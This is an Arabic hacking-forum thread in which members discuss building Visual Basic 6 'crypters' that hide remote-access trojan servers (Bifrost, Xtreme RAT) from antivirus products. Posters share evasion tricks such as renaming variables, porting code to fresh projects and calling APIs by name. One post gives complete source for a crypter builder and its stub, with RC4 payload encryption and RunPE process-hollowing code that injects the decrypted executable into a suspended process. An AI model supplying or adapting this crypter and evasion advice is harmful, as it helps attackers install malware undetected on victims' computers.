development-point - هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

development-point (https://vb.development-point.com/index.php)

- قسم إختراق الأجـهـزه والأيـمـيـلات (https://vb.development-point.com/forumdisplay.php?f=17)

هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

http://img440.imageshack.us/img440/6927/bsmlh16b.png

.!.
السلام عليكم ورحمة الله وبركاتهُ http://www.al-ghror.com/vb/images/smilies/004.gif http://www.ma-des.com/vb/images/smilies/f12.gif
بهاءُ ورقيُ لجنابات قومناً .. حضرواً وحضر العِز والفخرَ ، حتماً لـ تواجدكمُ نكهات الياسمينُ حضرت http://www.ma-des.com/vb/images/smilies/060.gif.http://www.dev-point.com/vb/imagize/smilies/D3.gif
مع تجددَ الطروحاتُ ، في دروب التطوير .. وعلى خُطى الماضِيين .. http://www.dev-point.com/vb/imagize/smilies/D6.gif
لـ التطوير سادة .. نحنُ سادتِهاً .. أقسمناً على المُضي قدماً ولا رادعِ لناً.

http://www.dev-point.com/vb/imagize/smilies/D11.gif أليوم مع نقأش عام و أستفسأرات حول عأألم ألتشفير بالفاجول بيسك6 أنها أللغه ألاقوى وانا اتحدى بها و اراهن عليها فلقد وفقنى ألله فى صناعه سورس كوداً.http://www.dev-point.com/vb/imagize/smilies/D11.gif وبنتيجه

https://www.metascan-online.com/en/s...3800ee92fb17b5

لآ تعليق على النتيجه مثل ما انتهم شايفين قوه هاللغه الجباأأره أليوم أى أستفسار

ساجيب عليه لين ما تصبحوا افضل منى الاستفسارات و النقاش مفتوح للجميع

اسالنى عن نقط ضعف حمايات اسالنى عن بنيه سورس كود أسال عن اى شئ و

سيتم الرد عليك مباشره الموضوع مبادره وقد تكلمت مع الاداره وطلبت منهم اى

مشاركه مشكووووور وألخ سيتم حذفها فهدفنا ألتطوير لا مشاركات عشوائيه فى

امان الله:SnipeR (29):http://www.dev-point.com/vb/imagize/smilies/D11.gif

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

تشفيره حلوة

انا عندي استفسارت لاني مختص فقط في الهكس لكن صرت اميل للفيجول بيسك لكن المشكله الي ممكن اي حد يواجها انو الكل عاوز يكون بشفر تشفيره خاصه فيه

يعني ما حد موضع القاعده الاساسية للتشفير في الفيجول بيسك يعني بصريح العباره اي حد بشوف شروحات تشفير الفيجول هوه عباره عن كوكتيل ليس له اي اساس يعني تضغط السيرفر مع اكم مودل مع خربشات ويطلعلك طاير اكم حمايه طبعا هذه الطريقه مش هتفيد بشيئ لانها مجرد خربشه

لو انت عايز تفيد وباين ما شاء الله عليك خبير في الفيجول وبتشفر ع قواعد اساسية مش تشفير خربشه

لو توضحلنا اساس تشفير الفيجول وكيف تعرف انو لو مثلا كتبت الكود هدا هيدعس الافيرا يعني توضع اساساته مثل اساسات الهكس
وكيف انت بنفسك تعمل تشفيره خاصه فيك طبعا مش اي حد يعمل تشفيره خاصه الا لما يكون عارف قاعدة التشفير في الفيجول بيسك

المطلوب توضيح اساست التشفير في الفيجول يعني الهكس واضح تقسم وتغير قيم وخلاص تشفر لانو في اساس واضح

بتمنا يكون وضحت الفكره

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

انا كنت زمان اميل مثل ما ان تتتكلم الى برامج ضغط وما الى ذلك و لكن توقفت كلامك صحيح واصبحت ادرس الحمايات بشكل موسع فقلت ليش عبابنه عندما انتج برنامج Biforst Stub Gen كان ينتج سيرفر كلين ؟؟؟؟
يعنى التشفير بالفاجول لا يعتمد على برامج الضغط فقط
فبدأت بتحليل الحمايات ووجدت انها من سورس كود أسهل بالمره من ادوات ضغط فكل حمايه فى فحصها تتركز على شئ واحد فقط
وبامكانك تلاعب بها
ففى بعض حمايات تتركز على Pe Header بمعنى انك لو ضفت فورمات عشوائيه تطيح وهالحمايات قويه جدا
فى سورس عبابنه فى حمايات قويه كانت تكشف سيرفر عندما يتم تحويل لهيكس

فجعلت التحويل من هيكس لبيتا و حمايه ملعونه راحت
بعض حمايات تعتمد على اسماء و متغيرات و بتغيرهم يطيح و هالحمايات مره ملعونه

بعض حمايات تعتمد على بيانات السورس بمعنى
لو سورس من 10 سنين وصار سيرفر مكشوف بتاخد بيانات السورس كود
وبتغير السورس كود هاد لسورس كود جديد بمعنى
تضيف الاكواد اللى فى فورم واحد لسورس جديد فى فورم واحد و الاكواد اللى بالموديل لموديل بالسورس الجديد وهكذا تطيح الحمايات ^_^ اشياء كثيره اتمنى ما يكون فى غموض نورت يا غالى

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

الله يعطيك العافية يا غالي

انا اميل الى الدلفي :)

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

عندي إستفسار حبيبي
ممكن دعس برامج الحماية دون برامج ظغط او شيء مثل هذا يعني فيجوال وحسب
++++
كيف يمكنني جعل السورس كود يظهر اول مرة للحمايات وما يكون مكشوف يعني نعيد تغيير مسمياته او شيء مثل هذا

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

+++++++
وماهي الحمايات التي تعتمد على Pe Header يعني تدعس بإضافات فورم وخربشات فقط
+++
وهل بعد إنتاج السرفر يجب ظغطه او فقط فيجوال، ؟

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة dz crow (المشاركة 13694)

ممكن دعس برامج الحماية دون برامج ظغط او شيء مثل هذا يعني فيجوال وحسب
بالتاكيد نعم

كيف يمكنني جعل السورس كود يظهر اول مرة للحمايات وما يكون مكشوف يعني نعيد تغيير مسمياته او شيء مثل هذا

استعمل سورس كود جديد يعنى بامكانك استخدام سورس من برنامج عبابنه بس عشان يكون مانه مألوف انقل هالسورس لمشروع جديد

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة Dz CrOw (المشاركة 13695)

وماهي الحمايات التي تعتمد على Pe Header يعني تدعس بإضافات فورم وخربشات فقط

bitdefender+emsisoft+panda

و النتيجه تختلف من ران بى لران بى ^_^
وهل بعد إنتاج السرفر يجب ظغطه او فقط فيجوال، ؟

لا ما فى داعى لاى ضغط الا اذا كنت تريد حجم قليل و تريد دعس حمايه عجزت عنها من سورس كود

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

جميل جدا وشكرا على الرد ولكن هذي الإجابات كلها لا اعرف اطبقها خخخ فقط اريد الإستفسار في المستقبل حين اجيد الفيجوال اطبقها إن شاء الله

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

قريبا دورتى لمنتديات صقور الابداع وبتكون الدوره الاقوى على مستوى منتديات للتشفير بال vb6 وستفهمنى جيدا
جيد جدا اخى انك متابع و تستفسر ^_^

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

شكرا أخي وبإنتظارك

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

أخي إستفسار هذا الدرس في ############### يحتاج السرفر نت فروم وررك ،؟؟

###############

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة Dz CrOw (المشاركة 13807)

أخي إستفسار هذا الدرس في ############### يحتاج السرفر نت فروم وررك ،؟؟
###############

عزيزى انت مخالف بوضعك رابط موقع اخر واامل ان لا تكرر ما فعلته مره اخرى ^_^
اما بخصوص النت فارم ورك فاكيد فاى استخدام لى vb.net يحتاج للفارم ورك

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

آسف لن يتكرر

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

مرحباً كوست

عندي سؤال

ما هي خوارزمية eof
+
ممكن شوي شرح عن الكود الذي يكتب في الستب

وشكراً

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

ولو ازعجتك

لكن لدي استفسار

صممت برنامج تشفير

ووضعت الازرار

وضعت في زر Crypt
هذا الكود

كود PHP:


		
			
Dim sInfo As String
Dim res As String
Dim sRes() As Byte
Dim sFile As Long
Dim TheEOF As String

sFile = FreeFile
sRes() = LoadResData("EXE", "CUSTOM")
If Text1.Text = "" Then
MsgBox "Please select a file First", vbCritical, "Error"
Exit Sub
Else
End If
If Check1.Value = Checked Then
TheEOF = ReadEOFData(txtFile.Text)
Else
End If

Open App.Path & "/Res.exe" For Binary Access Write As #sFile
Put #sFile, , sRes()
Close #sFile
Open App.Path & "/Res.exe" For Binary Access Read As #1
res = Input(LOF(1), 1)
Close #1
res = res & "XXXXX"
Open Text1.Text For Binary Access Read As #1
sInfo = sInfo & Input(LOF(1), 1)
Close #1
    
sInfo = RC4_String(sInfo, "AAAAA")
CommonDialog1.DialogTitle = "Select Saving Place"
CommonDialog1.DefaultExt = "exe"
CommonDialog1.Filter = "Executables (*.exe)|*.exe|All Files (*.*)|*.*"
CommonDialog1.ShowSave

Open CommonDialog1.FileName For Binary Access Write As #1
Put #1, 1, res & sInfo
Close #1
sInfo = ""
If Check3.Value = Checked Then
Call RealignPEFromFile(txtFile.Text)
Else
End If
xpProgressBar1.Value = xpProgressBar1.Value + 10
xpProgressBar1.Value = xpProgressBar1.Value + 15
Kill App.Path & "/Res.exe"
If Check1.Value = Checked Then
Call WriteEOFData(CommonDialog1.FileName, TheEOF)
End If
xpProgressBar1.Value = xpProgressBar1.Value + 15
xpProgressBar1.Value = xpProgressBar1.Value + 10
If Check4.Value = 1 Then
Call ReplaceIcons(Text3.Text, Text1.Text, vbNullString)
Else
End If
xpProgressBar1.Value = xpProgressBar1.Value + 25
xpProgressBar1.Value = xpProgressBar1.Value + 25
xpProgressBar1.Value = 100
MsgBox "Finished !!", vbInformation, "TenD3

"

ووضعت في الستب

موديل 1

كود PHP:


		
			

Private Sub Main()
On Error Resume Next

Static Control As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
Control = Input(LOF(1), 1)
Close #1

Control = Mid(Control, InStr(Control, "XXXXX") + 5, Len(Control))
Control = RC4_String(Control, "AAAAA")
PE App.Path + "\" + App.EXEName, STRING_TO_BYTES(Control)
End Sub

موديل 2

كود PHP:


		
			
Option Explicit
Private i As Integer
Private j As Integer
Private k As Integer
Private a As Byte
Private B As Byte
Dim M As Integer
Private L As Long
Private RC4KEY(255) As Byte
Private ADDTABLE(255, 255) As Byte
Dim STATE(0 To 255) As Byte

Private Sub FILL_LINEAR()
    Dim bCONST(0 To 255) As Byte
    For M = 0 To 255
        bCONST(M) = M
        STATE(M) = bCONST(M)
    Next M
End Sub

Public Sub RC4(BYTEARRAY() As Byte, Optional PASSWORD As String)
  If PASSWORD <> "" Then PREPARE_KEY PASSWORD
  For L = 0 To UBound(BYTEARRAY)
    i = ADDTABLE(i, 1)
    j = ADDTABLE(j, STATE(i))
    a = STATE(i): STATE(i) = STATE(j): STATE(j) = a
    B = STATE(ADDTABLE(STATE(i), STATE(j)))
    BYTEARRAY(L) = BYTEARRAY(L) Xor B
  Next L
End Sub

Private Sub PREPARE_KEY(sKEY As String)
  INITIALIZE_ADDTABLE
  FILL_LINEAR
  k = Len(sKEY)
  For i = 0 To k - 1
    B = Asc(Mid$(sKEY, i + 1, 1))
    For j = i To 255 Step k
      RC4KEY(j) = B
    Next j
  Next i
  j = 0
  For i = 0 To 255
    k = ADDTABLE(STATE(i), RC4KEY(i))
    j = ADDTABLE(j, k)
    B = STATE(i): STATE(i) = STATE(j): STATE(j) = B
  Next i
  i = 0
  j = 0
End Sub

Private Sub INITIALIZE_ADDTABLE()
  Static BeenHereDoneThat As Boolean
  If BeenHereDoneThat Then Exit Sub
  For j = 0 To 255
    For i = 0 To 255
      ADDTABLE(i, j) = CByte((i + j) And 255)
    Next i
  Next j
  BeenHereDoneThat = True
End Sub

Public Function STRING_TO_BYTES(sString As String) As Byte()
  STRING_TO_BYTES = StrConv(sString, vbFromUnicode)
End Function

Public Function BYTES_TO_STRING(bBytes() As Byte) As String
  BYTES_TO_STRING = bBytes
  BYTES_TO_STRING = StrConv(BYTES_TO_STRING, vbUnicode)
End Function

Public Function RC4_String(InputStr As String, PasswordStr As String) As String
Dim tmpByte() As Byte
tmpByte = STRING_TO_BYTES(InputStr)
RC4 tmpByte, PasswordStr
RC4_String = BYTES_TO_STRING(tmpByte)
End Function

موديل 3

كود PHP:


		
			
Private Const CONTEXT_FULL              As Long = &H10007
Private Const MAX_PATH                  As Integer = 260
Private Const CREATE_SUSPENDED          As Long = &H4
Private Const MEM_COMMIT                As Long = &H1000
Private Const MEM_RESERVE               As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE    As Long = &H40

Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Declare Sub RtlMoveMemory Lib "kernel32" (dest As Any, src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type


Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type

Private Type CONTEXT
    ContextFlags As Long

    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long

    FloatSave As FLOATING_SAVE_AREA
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type

Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type

Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress  As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics  As Long
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ' NT additional fields.
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type



Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type

Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Public Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    Dim bvASM(64)   As Byte 'enought to hold code + 10 params
    Dim i           As Long
    Dim lPos        As Long
    Dim sVal        As String

    bvASM(0) = &H58: bvASM(1) = &H59: bvASM(2) = &H59
    bvASM(3) = &H59: bvASM(4) = &H59: bvASM(5) = &H50
   
    lPos = 6
   
    For i = UBound(Params) To 0 Step -1
        bvASM(lPos) = &H68: lPos = lPos + 1
        sVal = (Params(i)): GoSub PutLong: lPos = lPos + 4
    Next
   
    bvASM(lPos) = &HE8: lPos = lPos + 1
    sVal = GetProcAddress(LoadLibraryA(sLib), sMod) - VarPtr(bvASM(lPos)) - 4
    GoSub PutLong: lPos = lPos + 4
    bvASM(lPos) = &HC3
    CallApiByName = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
   
    Exit Function
PutLong:
    'This is cheap replacement for RtlMoveMemory/putmem4 (hi/lo word/byte)
    sVal = Right$(String(8, "0") & Hex(sVal), 8)
    bvASM(lPos + 0) = ("&h" & Mid$(sVal, 7, 2))
    bvASM(lPos + 1) = ("&h" & Mid$(sVal, 5, 2))
    bvASM(lPos + 2) = ("&h" & Mid$(sVal, 3, 2))
    bvASM(lPos + 3) = ("&h" & Mid$(sVal, 1, 2))
    Return
End Function
Public Function PE(szProcessName As String, lpBuffer() As Byte)
On Error Resume Next
Dim Pidh As IMAGE_DOS_HEADER
Dim Pinh As IMAGE_NT_HEADERS
Dim Pish As IMAGE_SECTION_HEADER
Dim Si As STARTUPINFO
Dim Pi As PROCESS_INFORMATION
Dim Ctx As CONTEXT
Dim i As Long

    Si.cb = Len(Si)
    Ctx.ContextFlags = CONTEXT_FULL

    Call CallApiByName("kernel32", "RtlMoveMemory", VarPtr(Pidh), VarPtr(lpBuffer(0)), Len(Pidh))
    Call CallApiByName("kernel32", "RtlMoveMemory", VarPtr(Pinh), VarPtr(lpBuffer(Pidh.e_lfanew)), Len(Pinh))
    Call CallApiByName("kernel32", "CreateProcessW", 0, StrPtr(szProcessName), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(Si), VarPtr(Pi))
  
    Call CallApiByName("ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase)
    Call CallApiByName("kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    Call CallApiByName("kernel32", "WriteProcessMemory", Pi.hProcess, Pinh.OptionalHeader.ImageBase, VarPtr(lpBuffer(0)), Pinh.OptionalHeader.SizeOfHeaders, 0)

For i = 0 To Pinh.FileHeader.NumberOfSections - 1
    RtlMoveMemory Pish, lpBuffer(Pidh.e_lfanew + Len(Pinh) + Len(Pish) * i), Len(Pish)
    Call CallApiByName("kernel32", "WriteProcessMemory", Pi.hProcess, Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, VarPtr(lpBuffer(Pish.PointerToRawData)), Pish.SizeOfRawData, 0)
Next
    Call CallApiByName("kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx))
    Call CallApiByName("kernel32", "WriteProcessMemory", Pi.hProcess, Ctx.Ebx + 8, VarPtr(Pinh.OptionalHeader.ImageBase), 4, 0)
    Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
    Call CallApiByName("kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx))
    Call CallApiByName("kernel32", "ResumeThread", Pi.hThread)

End Function

Private Function Protect(ByVal characteristics As Long) As Long
   Dim mapping As Variant
   mapping = Array(PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
                   PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
                   PAGE_READWRITE, PAGE_EXECUTE_READWRITE)
   Protect = mapping(RShift(characteristics, 29))
End Function

Private Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
    RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
End Function

Private Function vbLongToULong(ByVal Value As Long) As Double
    If Value < 0 Then
        vbLongToULong = Value + OFFSET_4
    Else
        vbLongToULong = Value
    End If
End Function

والسيرفر بعد التشفير مكشوف من كل الحمايات
اذا اردت تشفير الستب
فما الطريقه الصحيحه
وشكرا

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

ان شاء الله سوف يدخل اخونا مستر جوهست ويرد على استفسارتكم
انا لا يوجد لدي استفسار حاليا
سوف اسئل بعد الاجابة عن السؤلين السابقين

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

H3cKeR TenD3

أهلا ياغالى اعتزر عن التاخير فى الرد
السبب فى كشف حمايات كلها الستب فهو الجزء الهام والاساسى فى برنامج التشفير
اما اخذت اكواد الستب وانتجته شوف كيف كانت نتيجه

http://chk4me.com/check/public/x82pQy6s15lr7AJ3

مكشوف من كل حمايات المهمه

بس انتظر شئ يومين انتهى من امتحاناتى و اسوى لك شرح لتشفير الستب

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة .ılı.мя●gh●ŠŦ.ılı. (المشاركة 15685)

h3cker tend3

أهلا ياغالى اعتزر عن التاخير فى الرد
السبب فى كشف حمايات كلها الستب فهو الجزء الهام والاساسى فى برنامج التشفير
اما اخذت اكواد الستب وانتجته شوف كيف كانت نتيجه

http://chk4me.com/check/public/x82pqy6s15lr7aj3

مكشوف من كل حمايات المهمه

بس انتظر شئ يومين انتهى من امتحاناتى و اسوى لك شرح لتشفير الستب

مشكور يالغلا بانتظارك يا بطل
ان شاء الله النجاح والموفقيه

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

مستر كوست ممكن شرح بسيط اساسيات التشفير الله يعطيك العافية ولو فديو 10 دقائق:SnipeR (69):
اكون ممنون منك عزيزي

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة cooil (المشاركة 16346)

مستر كوست ممكن شرح بسيط اساسيات التشفير الله يعطيك العافية ولو فديو 10 دقائق:SnipeR (69):
اكون ممنون منك عزيزي

http://sqebd.com/vb/forumdisplay.php?f=94
تابع الدوره

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

السلام عليكم و رحمة الله و بركاته

المشكل الوحيد بالتشفير بالفيجوال هو قلة أكواد الرانبي و الهاكس الي بايت

حتي أصبحنا نعتمد علي برانج الضغط فقط للتشفير بالــــ vb6

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة CrazyDZ (المشاركة 16626)

لا حبيبى مش هيك المشكله ان كل شروحات ادوات ضغط الران بى كتابته متاشبه بنسبه كبيره فى الجميع لاكن يختلف الاستدعاء فى api
call api by name
call api by hash
والخ
لاكن اى ران بى بيكون مشفر من كل حمايات الا افيرا لانه يعتمد فى تحليله على Call api In Runpe

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة .ılı.мя●Gh●ŠŦ.ılı. (المشاركة 16716)

شكراا GHost
:SnipeR (29)::SnipeR (29):

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

أخي عندي أقتراح
عند أستعمال برنامج Noura Hexor
لتحويل البايتات و سرفر بيفروست أعطاني
النتيجة هذه 21/26
لكن عند تغيير برنامج تحويل السرفر ألي بيانات هكس ببرنامج سيمون
و أستعمال سرفر أكستريم رات
أعطاني هذه النتيجة
http://chk4me.com/check/public/qXy91...7M84n8hrI8i2ud

طبعا الطريقة الأفتراضية

أذن علينا تغير النورا هكسور لأنو لا يجدي نفعا

وشكراا

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

بعد تطبيق الدورة كانت النتيجة جيدة جدا لكن ينكشف الافيرا بعد التكوين هل من حل وطبعا ينكشف ايضا الباندا

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

اقتباس:

المشاركة الأصلية كتبت بواسطة ramy_mm50 (المشاركة 22163)

بعد تطبيق الدورة كانت النتيجة جيدة جدا لكن ينكشف الافيرا بعد التكوين هل من حل وطبعا ينكشف ايضا الباندا

شفر بعد التكوين:SnipeR (36):

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

يعطيك العافيه اخوي

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

نقاش رائع :)

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

شكَـــرآ لكَ مستر قــوست ...
جــآري متــآبعة الدورةِ ...
أتركُ الأسئــله لــوقت آخــر ...

:SnipeR (37):

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

بالتوفيق شبااب :SnipeR (37):

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

الفجوال بيسك 6 هو الافضل ميىة مية يا جوووووووووووووست

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

شكرا لك
درس رائع
تم تقييمك
./.

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

يعطيك الف عافية اخي :* ^_^

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

كنق وربي تسلم

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

شكرا ولكن الهيكس مع التقسيم بالنسبة لي افضل الانه توجد اكثر من طريقة والتشفيرة تدوم مدة طويلة

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

ميدع من يومك شرح مفيد ووافي تحيااتي

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا

أخي ممكن تشرح كيفية دعس القيمة AntiVir (Avira):TR/Dropper.Gen بال VB6
وشكرا مسبقا

رد: هنا أستفسارات تشفير vb6 نقاش لتخطى حمايات نقط ضعفها كل شئ هنا